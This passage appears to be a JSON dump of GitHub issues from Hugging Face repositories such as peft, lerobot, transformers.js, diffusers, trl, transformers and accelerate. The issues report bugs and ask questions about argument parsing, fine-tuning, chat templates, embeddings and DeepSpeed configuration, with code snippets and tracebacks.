@githubnemo \n\n### Reproduction\n\n```\nfrom peft import LoraConfig\nfrom transformers import HfArgumentParser\n\np = HfArgumentParser(dataclass_types=LoraConfig) # fails\n```\n\n### Expected behavior\n\nI would expect LoraConfig to be supported by HfArgumentParser.\nAs I understand, this fails because HfArgumentParser does not support fields of type (`Optional[List[str], str]`).\n\nI had raised this in transformers as well, please refer [here](https://github.com/huggingface/transformers/issues/40915).\n\nCan we add stricter type checking for such fields so it can be easily integrated with other libraries and argument parsers?", "url": "https://github.com/huggingface/peft/issues/2798", "state": "closed", "labels": [], "created_at": "2025-09-23T05:19:34Z", "updated_at": "2025-09-23T12:37:47Z", "comments": 3, "user": "romitjain" }, { "repo": "huggingface/lerobot", "number": 1995, "title": "Questions about SmolVLA design", "body": "Hi! 
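To make the safetensors#653 report above measurable, a quick timing sketch: on a checkpoint with many tensors, repeated `get_slice` calls should show the per-call overhead the issue attributes to rebuilding the header `HashMap`. The file path is a placeholder.

```python
import time
from safetensors import safe_open

path = "model.safetensors"  # placeholder: ideally a checkpoint with many tensors

with safe_open(path, framework="pt") as f:
    names = list(f.keys())
    t0 = time.perf_counter()
    for n in names:
        f.get_slice(n)  # per the issue, each call rebuilds a HashMap of all headers
    dt = time.perf_counter() - t0

print(f"{len(names)} get_slice calls took {dt:.3f}s")
```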
I am looking into the details of SmolVLA implementation, and got some questions.\n\nI wonder the following points are necessary, or beneficial for the performance.\n\n\n1.\nhttps://github.com/huggingface/lerobot/blob/f7283193ea9ae932423e3a1e27524a27fa5c0fe5/src/lerobot/policies/smolvla/smolvlm_with_expert.py#L354C63-L354C74\n\nIn the cross-attention layer, the VLM keys and values are linear-projected before the attention interface.\n\nThey have compatible shape without the projection, and ROPE is not applied after the projection (although ROPE is applied in the VLM part, interaction between the ROPEd queries and projected keys might not work as rotation?)\n\n\n2.\nhttps://github.com/huggingface/lerobot/blob/f7283193ea9ae932423e3a1e27524a27fa5c0fe5/src/lerobot/policies/smolvla/modeling_smolvla.py#L566\n\nhttps://github.com/huggingface/lerobot/blob/f7283193ea9ae932423e3a1e27524a27fa5c0fe5/src/lerobot/policies/smolvla/modeling_smolvla.py#L592C1-L593C1\n\nimage and text embeddings are multiplied by `sqrt(dim)` before they are fed to the llm and expert layers.\n\nI could not find the same multiplication in SmolVLM modeling (https://github.com/huggingface/transformers/blob/main/src/transformers/models/smolvlm/modeling_smolvlm.py)\n\nI guess that this multiplication might change the distribution of image-text features.\n\n3.\nSmolVLM and SmolVLA are trained with different ROPE max frequency.\n\nIt seems like SmolVLM is trained with 100_000, and SmolVLA is trained with 10_000.\n\n4.\nIt seems like SmolVLM uses causal mask for all LLM layers. (no bidirectional attention for images)\n\nSmolVLA uses similar mask with PI0 (paligemma).\n", "url": "https://github.com/huggingface/lerobot/issues/1995", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-09-22T11:53:01Z", "updated_at": "2025-10-17T01:58:12Z", "user": "gliese581gg" }, { "repo": "huggingface/lerobot", "number": 1994, "title": "How to improve success rate and generalization", "body": "Hi, I have one question regarding the success rate, if I ensure the object appears in the frame of wrist camera at the beginning of dataset collection/inference, will this lead to higher success rate for pick and place task?\n\nMy initial attempt was object appears in the side view camera but does not appear in the wrist camera at the initial point/ beginning of dataset collection/inference.\n\n**Should I ensure object appears in both side view camera and wrist camera at the starting point of program?**", "url": "https://github.com/huggingface/lerobot/issues/1994", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-09-22T09:55:53Z", "updated_at": "2025-09-23T09:26:16Z", "user": "Liu9999ai" }, { "repo": "huggingface/smol-course", "number": 248, "title": "[QUESTION] About applying chat template for base model via `clone_chat_template` from trl", "body": "In the course [Supervised Fine-Tuning](https://huggingface.co/learn/smol-course/unit1/3), author uses base model `HuggingFaceTB/SmolLM3-3B-Base` but I choose `HuggingFaceTB/SmolLM2-135M` because it is lighter. However, I found that the base model `SmolLM2-135M` does not have its own chat template but it already had special tokens. 
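On point 2 of the SmolVLA design question above (lerobot#1995), a tiny numeric check makes the concern concrete: multiplying embeddings by `sqrt(dim)` rescales their standard deviation by `sqrt(dim)`, so it does change the distribution the expert layers see. The hidden size below is an arbitrary illustration value, not SmolVLA's actual one.

```python
import torch

dim = 960                                     # illustration value only
emb = torch.randn(4, 16, dim) * 0.02          # stand-in embedding activations
scaled = emb * (dim ** 0.5)
print(emb.std().item(), scaled.std().item())  # second is ~sqrt(dim)x larger
```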
However, special tokens may be incorrect; for example, bos_token and eos_token share the same token `<|endoftext|>`\n\n"Image"\n\nI also referred to the course [LLM Course, Fine-Tuning with SFTTrainer](https://huggingface.co/learn/llm-course/en/chapter11/3?fw=pt#implementation-with-trl), where the author uses `setup_chat_format` to create the chat template for a base model's tokenizer which does not have its own chat template.\n\nHowever, [`setup_chat_format`](https://github.com/huggingface/trl/blob/86f74b486fda475e5530a451d06b835361d959ac/trl/models/utils.py#L87) only supports the `chatml` format and will be deprecated in trl version 0.26.0. That is why I use [`clone_chat_template`](https://github.com/huggingface/trl/blob/86f74b486fda475e5530a451d06b835361d959ac/trl/models/utils.py#L165) instead.\n\nBut another issue appears here: while `clone_chat_template` only overwrites eos from the source tokenizer to the target tokenizer, `setup_chat_format` overwrites all of bos, eos, and pad. After I try to clone `Llama-3.2-Instruct`'s chat template, only eos changes to `<|eot_id|>`\n\n`model, tokenizer, added_tokens = clone_chat_template(model=model, tokenizer=tokenizer, source_tokenizer_path='meta-llama/Llama-3.2-1B-Instruct')`\n\n"Image"\n\nQuestions:\n1. Why does the base model's tokenizer already have special tokens, although it does not have a chat template?\n2. `clone_chat_template` does not overwrite all special tokens like bos, eos, pad, ... so are there any impacts on SFT training, and what is the solution for this?\n\nI am new to SFT and I really appreciate any support. Thank you.\n ", "url": "https://github.com/huggingface/smol-course/issues/248", "state": "open", "labels": [ "question" ], "created_at": "2025-09-22T03:03:56Z", "updated_at": "2025-09-22T19:13:17Z", "user": "binhere" }, { "repo": "huggingface/transformers.js", "number": 1419, "title": "Why is `token-classification` with T5 not available? (`T5ForTokenClassification`)", "body": "### Question\n\nIn Python `transformers` I can do:\n```python\nmodel = AutoModelForTokenClassification.from_pretrained(\"google-t5/t5-base\")\n```\nand use it with `Trainer` to train it (quite successfully).\nOr\n```python\nclassifier = pipeline(\"token-classification\", model=\"google-t5/t5-base\")\n```\nand use it for token classification.\n\nInstead, if I try to use it in `transformers.js` (web, 3.7.3):\n```js\nclassifier = await pipeline('token-classification', \"google-t5/t5-base\")\n```\nI receive this error:\n```\nUnsupported model type: t5\n```\n\nHow come? 
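For the smol-course#248 question above, a hedged sketch of the mechanics: after `clone_chat_template` copies the template and eos, the remaining special tokens can be aligned manually. Whether that alignment is *required* for SFT is exactly the open question, so this only shows how, not whether. The `clone_chat_template` call mirrors the one quoted in the issue.

```python
from transformers import AutoModelForCausalLM, AutoTokenizer
from trl import clone_chat_template

model = AutoModelForCausalLM.from_pretrained("HuggingFaceTB/SmolLM2-135M")
tokenizer = AutoTokenizer.from_pretrained("HuggingFaceTB/SmolLM2-135M")

model, tokenizer, added_tokens = clone_chat_template(
    model=model, tokenizer=tokenizer,
    source_tokenizer_path="meta-llama/Llama-3.2-1B-Instruct",
)

# eos was overwritten by the clone; reuse it as pad so batches can be padded,
# and leave bos alone unless the cloned template actually emits a bos token.
if tokenizer.pad_token is None:
    tokenizer.pad_token = tokenizer.eos_token
    model.config.pad_token_id = tokenizer.pad_token_id

print(tokenizer.bos_token, tokenizer.eos_token, tokenizer.pad_token)
```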
Or is there another way to use T5 for token classification in JavaScript?\n", "url": "https://github.com/huggingface/transformers.js/issues/1419", "state": "open", "labels": [ "question" ], "created_at": "2025-09-21T23:30:22Z", "updated_at": "2025-09-24T21:42:56Z", "user": "debevv" }, { "repo": "huggingface/transformers.js", "number": 1418, "title": "EmbeddingGemma usage", "body": "### Question\n\nI'm new to transformers.js. \nI want to use embeddinggemma in my web app and I've looked at the example on its usage at this link:\nhttps://huggingface.co/blog/embeddinggemma#transformersjs\n\nAt the same time I've seen different code, using pipeline, regarding embeddings:\nhttps://huggingface.co/docs/transformers.js/api/pipelines#pipelinesfeatureextractionpipeline\n\nI'm trying to create a custom pipeline, and in TypeScript I'm building the pipeline like this\n\n```ts\nclass EmbeddingPipeline {\n private static instance: Promise | null = null;\n private static model = 'onnx-community/embeddinggemma-300m-ONNX';\n private static readonly task = 'feature-extraction';\n\n // Detected device (default wasm)\n private static device: 'webgpu' | 'wasm' = 'wasm';\n private static deviceInitPromise: Promise | null = null;\n\n private static async detectDeviceOnce(): Promise {\n if (this.deviceInitPromise) return this.deviceInitPromise;\n this.deviceInitPromise = (async () => {\n if (typeof navigator !== 'undefined' && 'gpu' in navigator) {\n try {\n const adapter = await (navigator as any).gpu.requestAdapter();\n if (adapter) {\n this.device = 'webgpu';\n return;\n }\n } catch {\n // ignore, fallback to wasm\n }\n }\n this.device = 'wasm';\n })();\n return this.deviceInitPromise;\n }\n\n static getSelectedDevice(): 'webgpu' | 'wasm' {\n return this.device;\n }\n\n static async getInstance(progress_callback?: ProgressCallback): Promise {\n if (this.instance) return this.instance;\n\n // Detect the device only once\n await this.detectDeviceOnce();\n\n const build = async (device: 'webgpu' | 'wasm') =>\n pipeline(\n this.task,\n this.model,\n {\n progress_callback,\n dtype: 'q8',\n device\n }\n ) as Promise;\n\n this.instance = (async (): Promise => {\n try {\n return await build(this.device);\n } catch (e) {\n if (this.device === 'webgpu') {\n // Automatic fallback to wasm\n this.device = 'wasm';\n return await build('wasm');\n }\n throw e;\n }\n })();\n\n return this.instance;\n }\n}\n\n\nconst getEmbeddingDevice = () => EmbeddingPipeline.getSelectedDevice();\nconst embedding_prefixes_per_task: Record = {\n 'query': \"task: search result | query: \",\n 'document': \"title: none | text: \",\n};\n\nexport type EmbeddingTask = 'query' | 'document';\n\nexport const getEmbedding = async (task: EmbeddingTask, text: string): Promise => {\n const extractor = await EmbeddingPipeline.getInstance();\n\n const prefix = embedding_prefixes_per_task[task];\n const result = await extractor(`${prefix}${text}`, { pooling: 'mean', normalize: true });\n\n return result.data as Float32Array;\n};\n```\n\nI'm using the same sentences (with prefixes) used by your example (I'm running both my class and your code to check whether they match) and the embedding result is different.\n\nWhat am I doing wrong? 
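On the T5 token-classification question above (transformers.js#1419): the issue itself confirms the Python side works, so a reasonable baseline while browser support is missing is to train in Python and only then worry about the ONNX export. The sketch below shows that Python-side baseline only; the untrained classification head is initialized randomly, so this is for shape-checking, not inference quality.

```python
import torch
from transformers import AutoModelForTokenClassification, AutoTokenizer

# Works in Python, as stated in the issue; the head is freshly initialized.
tok = AutoTokenizer.from_pretrained("google-t5/t5-base")
model = AutoModelForTokenClassification.from_pretrained("google-t5/t5-base")

inputs = tok("HuggingFace is based in New York City", return_tensors="pt")
with torch.no_grad():
    logits = model(**inputs).logits  # (batch, seq_len, num_labels)
print(logits.argmax(-1))
```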
Do you have any reference to some proper docs reference that explain properly how this works?\n\nThanks", "url": "https://github.com/huggingface/transformers.js/issues/1418", "state": "open", "labels": [ "question", "v4" ], "created_at": "2025-09-21T10:26:22Z", "updated_at": "2025-11-08T15:33:16Z", "user": "MithrilMan" }, { "repo": "huggingface/diffusers", "number": 12359, "title": "Chroma pipeline documentation bug regarding the `guidance_scale` parameter", "body": "### Describe the bug\n\nFrom my understanding, Chroma is a retrained and dedistilled version of the Flux architecture, so it uses true CFG, unlike Flux. I can indeed confirm that this is true by tracing through the source code. \nHowever, currently the documentation for the `guidance_scale` parameter in the `ChromaPipeline.__call__()` method mentions otherwise, presumably because it was copied over from the `FluxPipeline` documentation. \n\n### Reproduction\n\nThe current documentation for the `guidance_scale` parameter in the `ChromaPipeline.__call__()` method:\n```python\n'''\nguidance_scale (float, optional, defaults to 3.5) \u2014 Embedded guiddance scale is enabled by setting guidance_scale > 1. Higher guidance_scale encourages a model to generate images more aligned with prompt at the expense of lower image quality.\nGuidance-distilled models approximates true classifer-free guidance for guidance_scale > 1. Refer to the [paper](https://huggingface.co/papers/2210.03142) to learn more.\n'''\n```\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.36.0.dev0\n- Platform: Windows-10-10.0.26100-SP0\n- Running on Google Colab?: No\n- Python version: 3.11.9\n- PyTorch version (GPU?): 2.7.1+cu128 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.34.4\n- Transformers version: 4.55.0\n- Accelerate version: 1.10.0\n- PEFT version: 0.17.0\n- Bitsandbytes version: 0.47.0\n- Safetensors version: 0.6.2\n- xFormers version: 0.0.31.post1\n- Accelerator: NVIDIA GeForce RTX 4090, 24564 MiB\n- Using GPU in script?: No\n- Using distributed or parallel set-up in script?: No\n\n### Who can help?\n\n@stevhliu ", "url": "https://github.com/huggingface/diffusers/issues/12359", "state": "closed", "labels": [ "bug" ], "created_at": "2025-09-21T08:34:15Z", "updated_at": "2025-09-22T20:04:15Z", "comments": 1, "user": "mingyi456" }, { "repo": "huggingface/trl", "number": 4110, "title": "How does `trl` know what part of dataset is prompt and completion in the following situation?", "body": "### Reproduction\n\n```python\nimport torch\nimport trl as r\nimport peft as p\nimport datasets as d\nimport accelerate as a\nimport transformers as t\n\nallowed_entities = ['AGE', 'EYECOLOR', 'GENDER', 'HEIGHT', 'WEIGHT', 'SEX']\nentity_mapping = {\n \"ACCOUNTNAME\": \"account_name\",\n \"ACCOUNTNUMBER\": \"account_number\",\n \"AGE\": \"age\",\n \"AMOUNT\": \"amount\",\n \"BIC\": \"bic\",\n \"BITCOINADDRESS\": \"bitcoin_address\",\n \"BUILDINGNUMBER\": \"building_number\",\n \"CITY\": \"city\",\n \"COMPANYNAME\": \"company_name\",\n \"COUNTY\": \"county\",\n \"CREDITCARDCVV\": \"credit_card_cvv\",\n \"CREDITCARDISSUER\": \"credit_card_issuer\",\n \"CREDITCARDNUMBER\": \"credit_card_number\",\n \"CURRENCY\": \"currency\",\n \"CURRENCYCODE\": \"currency_code\",\n \"CURRENCYNAME\": \"currency_name\",\n \"CURRENCYSYMBOL\": \"currency_symbol\",\n \"DATE\": \"date\",\n \"DOB\": \"dob\",\n \"EMAIL\": \"email\",\n \"ETHEREUMADDRESS\": 
\"ethereum_address\",\n \"EYECOLOR\": \"eye_color\",\n \"FIRSTNAME\": \"first_name\",\n \"GENDER\": \"gender\",\n \"HEIGHT\": \"height\",\n \"IBAN\": \"iban\",\n \"IP\": \"ip\",\n \"IPV4\": \"ipv4\",\n \"IPV6\": \"ipv6\",\n \"JOBAREA\": \"job_area\",\n \"JOBTITLE\": \"job_title\",\n \"JOBTYPE\": \"job_type\",\n \"LASTNAME\": \"last_name\",\n \"LITECOINADDRESS\": \"litecoin_address\",\n \"MAC\": \"mac\",\n \"MASKEDNUMBER\": \"masked_number\",\n \"MIDDLENAME\": \"middle_name\",\n \"NEARBYGPSCOORDINATE\": \"nearby_gps_coordinate\",\n \"ORDINALDIRECTION\": \"ordinal_direction\",\n \"PASSWORD\": \"password\",\n \"PHONEIMEI\": \"phone_imei\",\n \"PHONENUMBER\": \"phone_number\",\n \"PIN\": \"pin\",\n \"PREFIX\": \"prefix\",\n \"SECONDARYADDRESS\": \"secondary_address\",\n \"SEX\": \"sex\",\n \"SSN\": \"ssn\",\n \"STATE\": \"state\",\n \"STREET\": \"street\",\n \"TIME\": \"time\",\n \"URL\": \"url\",\n \"USERAGENT\": \"user_agent\",\n \"USERNAME\": \"username\",\n \"VEHICLEVIN\": \"vehicle_vin\",\n \"VEHICLEVRM\": \"vehicle_vrm\",\n \"ZIPCODE\": \"zip_code\"\n}\n\ndef formatting_function(x):\n entities = []\n for entity in x['privacy_mask']:\n if entity['label'] not in allowed_entities:\n entities.append({'value': entity['value'], 'label': entity_mapping[entity['label']]})\n prompt = f\"Extract all the personal information from the following text and classify it: {x['source_text']}\"\n completion = str(entities)\n return {\"text\": f\"### PROMPT\\n{prompt}\\n\\n### COMPLETION\\n{completion}\"}\n\ndef main():\n model_name = \"Qwen/Qwen3-0.6B\"\n dataset_name = \"ai4privacy/pii-masking-200k\"\n\n quantization = False\n quantization_bits = \"8\"\n lora = True\n lora_rank = 8\n lora_alpha = 16\n lora_dropout = 0.05\n use_mixed_precision = True\n # Training parameters\n completion_only_loss = True\n output_dir = f\"/scratch/bminesh-shah/phi-ner/{model_name.replace('/', '-')}_pii_finetuned_prompt_completion\"\n learning_rate = 1e-4\n num_train_epochs = 10\n per_device_train_batch_size = 2\n gradient_accumulation_steps = 8\n\n accelerator = a.Accelerator()\n\n dataset = d.load_dataset(dataset_name)\n dataset = dataset.filter(lambda x: x['language'] == 'en')\n dataset = dataset.remove_columns(['target_text', 'span_labels', 'mbert_text_tokens', 'mbert_bio_labels', 'id', 'language', 'set'])\n dataset = dataset['train']\n dataset = dataset.train_test_split(test_size=0.2, seed=24, shuffle=True)\n print(dataset)\n\n if accelerator.is_main_process:\n dataset = dataset.map(formatting_function, remove_columns=['source_text', 'privacy_mask'])\n print(dataset)\n print(dataset['train'][0])\n\n tokenizer = t.AutoTokenizer.from_pretrained(model_name, trust_remote_code=True)\n tokenizer.pad_token = tokenizer.eos_token\n tokenizer.padding_side = \"right\"\n\n bnb_config = None\n if quantization and quantization_bits == \"4\":\n bnb_config = t.BitsAndBytesConfig(load_in_4bit=True, bnb_4bit_quant_type=\"nf4\", bnb_4bit_compute_dtype=torch.bfloat16, bnb_4bit_use_double_quant=True)\n elif quantization and quantization_bits == \"8\":\n bnb_config = t.BitsAndBytesConfig(load_in_8bit=True)\n\n model = t.AutoModelForCausalLM.from_pretrained(\n model_name,\n quantization_config=bnb_config,\n device_map={\"\": accelerator.process_index},\n dtype=torch.bfloat16 if use_mixed_precision else torch.float32,\n trust_remote_code=True\n )\n\n if quantization:\n model = p.prepare_model_for_kbit_training(model)\n model.config.use_cache = False\n model.config.pretraining_tp = 1\n model.config.pad_token_id = model.config.eos_token_id\n\n if 
lora:\n lora_config = p.LoraConfig(r=lora_rank, lora_alpha=lora_alpha, lora_dropout=lora_dropout, bias=\"none\", task_type=\"CAUSAL_LM\")\n model = p.get_peft_model(model, lora_config)\n model.train()\n\n sft_config = r.SFTConfig(\n learning_rate=learning_rate,\n num_train_epochs=num_train_epochs,\n per_device_train_batch_size=per_device_train_batch_size,\n gradient_accumulation_steps=gradient_accumulation_steps,\n output_dir=output_dir,\n eval_s", "url": "https://github.com/huggingface/trl/issues/4110", "state": "closed", "labels": [ "\ud83d\udc1b bug", "\ud83d\udcda documentation" ], "created_at": "2025-09-19T17:42:26Z", "updated_at": "2025-09-19T20:02:16Z", "user": "bminesh-shah" }, { "repo": "huggingface/transformers", "number": 41005, "title": "Are we have Qwen3VL Official Model Published by Alibaba", "body": "### Model description\n\nReference - https://huggingface.co/docs/transformers/main/en/model_doc/qwen3_vl#transformers.Qwen3VLForConditionalGeneration\n\nIf not when can we expect any guess?", "url": "https://github.com/huggingface/transformers/issues/41005", "state": "closed", "labels": [ "New model" ], "created_at": "2025-09-19T13:59:34Z", "updated_at": "2025-09-20T10:00:04Z", "comments": 1, "user": "Dineshkumar-Anandan-ZS0367" }, { "repo": "huggingface/transformers", "number": 40993, "title": "HfArgumentParser cannot parse TRL Config", "body": "### System Info\n\ntransformers==4.56.1\ntrl==0.17.0\n\nI used to apply code below\n\n```python\nfrom transformers import HfArgumentParser\nfrom trl import (\n\tScriptArguments, ModelConfig, SFTConfig\n)\nparser = HfArgumentParser((ScriptArguments, SFTConfig, ModelConfig))\nscript_arguments, trainer_config, model_config = parser.parse_args_into_dataclasses()\n```\n\nto parse training args, but after updating transformers to 4.56, it does not work:\n\n```\nTraceback (most recent call last):\n File \"D:\\mytest.py\", line 5, in \n parser = HfArgumentParser((ScriptArguments, SFTConfig, ModelConfig))\n File \"E:\\Anaconda3\\envs\\myopenai\\lib\\site-packages\\transformers\\hf_argparser.py\", line 143, in __init__\n self._add_dataclass_arguments(dtype)\n File \"E:\\Anaconda3\\envs\\myopenai\\lib\\site-packages\\transformers\\hf_argparser.py\", line 260, in _add_dataclass_arguments\n raise RuntimeError(\nRuntimeError: Type resolution failed for . 
Try declaring the class in global scope or removing line of `from __future__ import annotations` which opts in Postponed Evaluation of Annotations (PEP 563)\n```\n\nHow to fix it?\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nRun \n\n```python\nfrom transformers import HfArgumentParser\nfrom trl import (\n\tScriptArguments, ModelConfig, SFTConfig\n)\nparser = HfArgumentParser((ScriptArguments, SFTConfig, ModelConfig))\nscript_arguments, trainer_config, model_config = parser.parse_args_into_dataclasses()\n```\n\n### Expected behavior\n\nIt should work", "url": "https://github.com/huggingface/transformers/issues/40993", "state": "closed", "labels": [ "bug" ], "created_at": "2025-09-19T08:29:48Z", "updated_at": "2025-09-19T09:06:20Z", "comments": 5, "user": "caoyang-sufe" }, { "repo": "huggingface/lerobot", "number": 1978, "title": "Is there a best-fit model for each sim env?", "body": "I tried to train diffusion, smolvla, and even pi0 on aloha with 200k steps, and found that they all perform much worse (with less than a 10% success rate) than the act policy. Why? Does each env task have a best-fit policy, or is there a problem with my training strategy?", "url": "https://github.com/huggingface/lerobot/issues/1978", "state": "closed", "labels": [ "question", "policies", "simulation" ], "created_at": "2025-09-19T02:45:14Z", "updated_at": "2025-10-17T11:25:27Z", "user": "shs822" }, { "repo": "huggingface/accelerate", "number": 3784, "title": "AttributeError: 'Accelerator' object has no attribute 'deepspeed_config'. 
Did you mean: 'deepspeed_plugin'?", "body": "### System Info\n\n```Shell\n- Name: accelerate Version: 1.10.1\n- Name: transformers Version: 4.54.0\n- Name: deepspeed Version: 0.17.5\n- Name: torch Version: 2.8.0\n- Name: wandb Version: 0.21.4\n```\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nThis is a deepspeed stage 2 config which is in json:\n\n```\njson = {\n \"fp16\": {\n \"enabled\": false,\n \"auto_cast\": true,\n \"loss_scale\": 0,\n \"loss_scale_window\": 1000,\n \"initial_scale_power\": 16,\n \"hysteresis\": 2,\n \"min_loss_scale\": 1\n },\n \"bf16\": {\n \"enabled\": true\n },\n \"amp\": {\n \"enabled\": false\n },\n \"optimizer\": {\n \"type\": \"AdamW\",\n \"params\": {\n \"lr\": 0.0003,\n \"betas\": [0.9, 0.999],\n \"eps\": 1e-08,\n \"weight_decay\": 0.001\n }\n },\n \"scheduler\": {\n \"type\": \"WarmupLR\",\n \"params\": {\n \"warmup_min_lr\": 0,\n \"warmup_max_lr\": 0.0003,\n \"warmup_num_steps\": 0\n }\n },\n \"zero_optimization\": {\n \"stage\": 2,\n \"allgather_partitions\": true,\n \"allgather_bucket_size\": 5.000000e+08,\n \"overlap_comm\": false,\n \"reduce_scatter\": true,\n \"reduce_bucket_size\": 9.000000e+05,\n \"contiguous_gradients\": true,\n \"use_multi_rank_bucket_allreduce\": false\n },\n \"zero_state\": 2,\n \"gradient_accumulation_steps\": 1,\n \"gradient_clipping\": 1,\n \"train_micro_batch_size_per_gpu\": 4,\n \"mixed_precision\": \"bf16\",\n \"communication_data_type\": \"bf16\",\n \"steps_per_print\": inf\n}\n```\n\nI use `accelerate to spin up 8 workers on an AWS EC2 instance`:\n\n```bash\naccelerate launch --config_file configs/deepspeed.yaml scripts/main.py\n```\n\nThe following error is raised when the `trainer` runs `train`:\n\n```\n File \"/home/ubuntu/llm-classifiier/scripts/main.py\", line 88, in \n train_qwen_any(cli_args, run_args)\n File \"/home/ubuntu/llm-classifiier/scripts/train_qwen.py\", line 138, in train_qwen_any\n trainer.train()\n File \"/home/ubuntu/llm-classifiier/venv/lib/python3.12/site-packages/transformers/trainer.py\", line 2237, in train\n return inner_training_loop(\n ^^^^^^^^^^^^^^^^^^^^\n File \"/home/ubuntu/llm-classifiier/venv/lib/python3.12/site-packages/transformers/trainer.py\", line 2758, in _inner_training_loop\n self.control = self.callback_handler.on_train_end(args, self.state, self.control)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/ubuntu/llm-classifiier/venv/lib/python3.12/site-packages/transformers/trainer_callback.py\", line 509, in on_train_end\n return self.call_event(\"on_train_end\", args, state, control)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/ubuntu/llm-classifiier/venv/lib/python3.12/site-packages/transformers/trainer_callback.py\", line 556, in call_event\n result = getattr(callback, event)(\n ^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/ubuntu/llm-classifiier/venv/lib/python3.12/site-packages/transformers/integrations/integration_utils.py\", line 958, in on_train_end\n fake_trainer.save_model(temp_dir)\n File \"/home/ubuntu/llm-classifiier/venv/lib/python3.12/site-packages/transformers/trainer.py\", line 3965, in save_model\n state_dict = self.accelerator.get_state_dict(self.deepspeed)\n 
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/ubuntu/llm-classifiier/venv/lib/python3.12/site-packages/accelerate/accelerator.py\", line 3903, in get_state_dict\n zero3_sharding = self.deepspeed_config[\"zero_optimization\"][\"stage\"] == 3\n ^^^^^^^^^^^^^^^^^^^^^\nAttributeError: 'Accelerator' object has no attribute 'deepspeed_config'. Did you mean: 'deepspeed_plugin'?\n```\n\nI am not using zero3 sharding, so I don't know why this is an issue at all!\n\nMy deepspeed.yaml looks like this\n\n```\ncompute_environment: LOCAL_MACHINE\ndebug: true\ndeepspeed_config:\n deepspeed_config_file: configs/deepspeed_stg2.json\ndistributed_type: DEEPSPEED\nenable_cpu_affinity: false\nmachine_rank: 0\nmain_training_function: main\nnum_machines: 1\nnum_processes: 4\nrdzv_backend: static\nsame_network: true\ntpu_env: []\ntpu_use_cluster: false\ntpu_use_sudo: false\nuse_cpu: false\n```\n\nAnd the actual json file is above.\nBecause of this I cannot save my models or state_dicts.\n\n### Expected behavior\n\nUnless I am missing something profound, this really shouldn't be happening.", "url": "https://github.com/huggingface/accelerate/issues/3784", "state": "closed", "labels": [], "created_at": "2025-09-18T17:07:54Z", "updated_at": "2025-10-27T15:08:19Z", "comments": 1, "user": "alexge233" }, { "repo": "huggingface/lerobot", "number": 1969, "title": "how to record a multi-task dataset on so101?", "body": "I found that only can use \"dataset.single_task\" to record , but i need to record a dataset contains more than 3 tasks. how to solve it. ", "url": "https://github.com/huggingface/lerobot/issues/1969", "state": "closed", "labels": [], "created_at": "2025-09-18T10:18:00Z", "updated_at": "2025-09-21T02:50:59Z", "user": "Temmp1e" }, { "repo": "huggingface/lerobot", "number": 1966, "title": "SO101FollowerEndEffector?", "body": "I am trying to get inverse kinematics to work on my SO-101, and I found SO100FollowerEndEffector but there is no SO101FollowerEndEffector?\n\nI suspect they are interchangeable, but when I use SO100FollowerEndEffector on my SO-101, it want me to recalibrate it, so I just want to make sure before I break anything.", "url": "https://github.com/huggingface/lerobot/issues/1966", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-09-17T23:56:38Z", "updated_at": "2025-10-30T08:56:22Z", "user": "cashlo" }, { "repo": "huggingface/lighteval", "number": 970, "title": "How to use a configuration file?", "body": "The documentation makes references to using configuration yaml files like [here](https://huggingface.co/docs/lighteval/main/en/use-litellm-as-backend) but it doesn't give the name of the file or which option to feed the config to lighteval. 
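For the `deepspeed_config` AttributeError above (accelerate#3784), a heavily hedged stopgap sketch: the traceback shows `Accelerator.get_state_dict` reading `self.deepspeed_config`, while the config actually lives on the plugin when it comes from a JSON file. Mirroring it onto the accelerator before training is an unverified workaround, not an upstream fix, and `deepspeed_plugin.deepspeed_config` is assumed to carry the parsed dict.

```python
from accelerate import Accelerator

accelerator = Accelerator()
plugin = accelerator.state.deepspeed_plugin
if plugin is not None and not hasattr(accelerator, "deepspeed_config"):
    # Assumed attribute: expose the plugin's parsed config dict under the
    # name that get_state_dict expects, so the zero3 check can run.
    accelerator.deepspeed_config = plugin.deepspeed_config
```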
I tried making a `config.yaml`, `config.yml` in the current directory and trying a `--config` option (doesn't exist).", "url": "https://github.com/huggingface/lighteval/issues/970", "state": "closed", "labels": [], "created_at": "2025-09-16T20:13:48Z", "updated_at": "2025-09-24T22:08:32Z", "user": "oluwandabira" }, { "repo": "huggingface/transformers", "number": 40915, "title": "HfArgumentParser does not support peft.LoraConfig", "body": "### System Info\n\n- `transformers` version: 4.57.0.dev0\n- Platform: Linux-5.14.0-284.73.1.el9_2.x86_64-x86_64-with-glibc2.39\n- Python version: 3.12.3\n- Huggingface_hub version: 0.34.4\n- Safetensors version: 0.5.2\n- Accelerate version: 1.10.1\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.8.0+cu128 (CUDA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: No\n- Using GPU in script?: No\n- GPU type: NVIDIA A100-SXM4-80GB\n\n### Who can help?\n\n@ydshieh (I am not really sure who to tag here)\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details 